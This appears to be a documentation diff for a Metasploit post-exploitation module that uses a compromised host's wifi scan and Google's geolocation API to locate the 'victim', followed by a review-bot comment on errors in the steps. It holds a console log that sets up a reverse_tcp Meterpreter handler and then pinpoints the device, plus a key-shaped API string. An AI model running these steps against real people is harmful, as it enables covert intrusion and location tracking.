|
| 1 | +## Creating A Testing Environment |
| 2 | + |
| 3 | + For this module to work you need a box with a wireless adapter. The following methods are used to gather |
| 4 | + wireless information from the host: |
| 5 | + |
| 6 | + - Windows: `netsh wlan show networks mode=bssid` |
| 7 | + - OSX: `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s` |
| 8 | + - Linux: `iwlist scanning` |
| 9 | + - Solaris: `dladm scan-wifi` |
| 10 | + - BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"` |
| 11 | + |
| 12 | + If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized. |
| 13 | + These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original |
| 14 | + methodology used by this module in [#3280](https://github.com/rapid7/metasploit-framework/pull/3280), |
| 15 | + which didn't require an API key, was found to no longer work in [#8928](https://github.com/rapid7/metasploit-framework/issues/8928). |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Start msfconsole |
| 20 | + 2. Obatin a meterpreter session via whatever method |
| 21 | + 3. Do: `use post/multi/gather/wlan_geolocate` |
| 22 | + 4. Do: `set session #` |
| 23 | + 5. Do: `set apikey [key]` |
| 24 | + 5. Do: `run` |
| 25 | + |
| 26 | +## Options |
| 27 | + |
| 28 | + **geolocate** |
| 29 | + |
| 30 | + A boolean on if wireless information should only be gathered, or the Google geolocate API should be used to geo the victim. Defaults to `false` |
| 31 | + |
| 32 | + **apikey** |
| 33 | + |
| 34 | + A string containing the Google provided geolocation api key. **REQUIRED** if `geolocate` is set to true. Defaults to empty string |
| 35 | + |
| 36 | +## Scenarios |
| 37 | + |
| 38 | +### Windows 10 |
| 39 | + |
| 40 | + resource (met_rev.rc)> use exploit/multi/handler |
| 41 | + resource (met_rev.rc)> set payload windows/meterpreter/reverse_tcp |
| 42 | + payload => windows/meterpreter/reverse_tcp |
| 43 | + resource (met_rev.rc)> setg lhost 2.2.2.2 |
| 44 | + lhost => 2.2.2.2 |
| 45 | + resource (met_rev.rc)> set lport 9876 |
| 46 | + lport => 9876 |
| 47 | + resource (met_rev.rc)> setg verbose true |
| 48 | + verbose => true |
| 49 | + resource (met_rev.rc)> exploit |
| 50 | + [*] Exploit running as background job 0. |
| 51 | + [*] Started reverse TCP handler on 2.2.2.2:9876 |
| 52 | + [*] Sending stage (179267 bytes) to 1.1.1.1 |
| 53 | + [*] Meterpreter session 1 opened (2.2.2.2:9876 -> 1.1.1.1:16111) at 2017-10-01 19:27:15 -0400 |
| 54 | + |
| 55 | + resource (met_rev.rc)> use post/multi/gather/wlan_geolocate |
| 56 | + resource (met_rev.rc)> set geolocate true |
| 57 | + geolocate => true |
| 58 | + resource (met_rev.rc)> set session 1 |
| 59 | + session => 1 |
| 60 | + resource (met_rev.rc)> set apikey ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 |
| 61 | + apikey => ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 |
| 62 | + msf post(wlan_geolocate) > run |
| 63 | + [+] Wireless list saved to loot. |
| 64 | + [*] Google indicates the device is within 30.0 meters of 30.3861197,-97.7385878. |
| 65 | + [*] Google Maps URL: https://maps.google.com/?q=30.3861197,-97.7385878 |
| 66 | + [*] Post module execution completed |
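Review bot: The Verification Steps (doc lines 19-24) set `apikey` but never `set geolocate true`, and the Options section says `geolocate` defaults to `false`, so following the steps as written only saves the wireless list and never exercises the Google API path that the Windows 10 scenario demonstrates. Suggest adding a `Do: set geolocate true` step before `set apikey [key]`, and renumbering, since step 5 appears twice. Smaller points in the same file: the BSD command on doc line 10 ends with a stray `"` after `uniq`; "Obatin" on doc line 20 should be "Obtain"; the option is written `GEOLOCATE` on doc line 12 but `geolocate` everywhere else, so pick one spelling; and the `apikey` value on doc lines 60-61 should be an obvious placeholder such as `[key]` rather than a key-shaped string, in case it is or resembles a live credential.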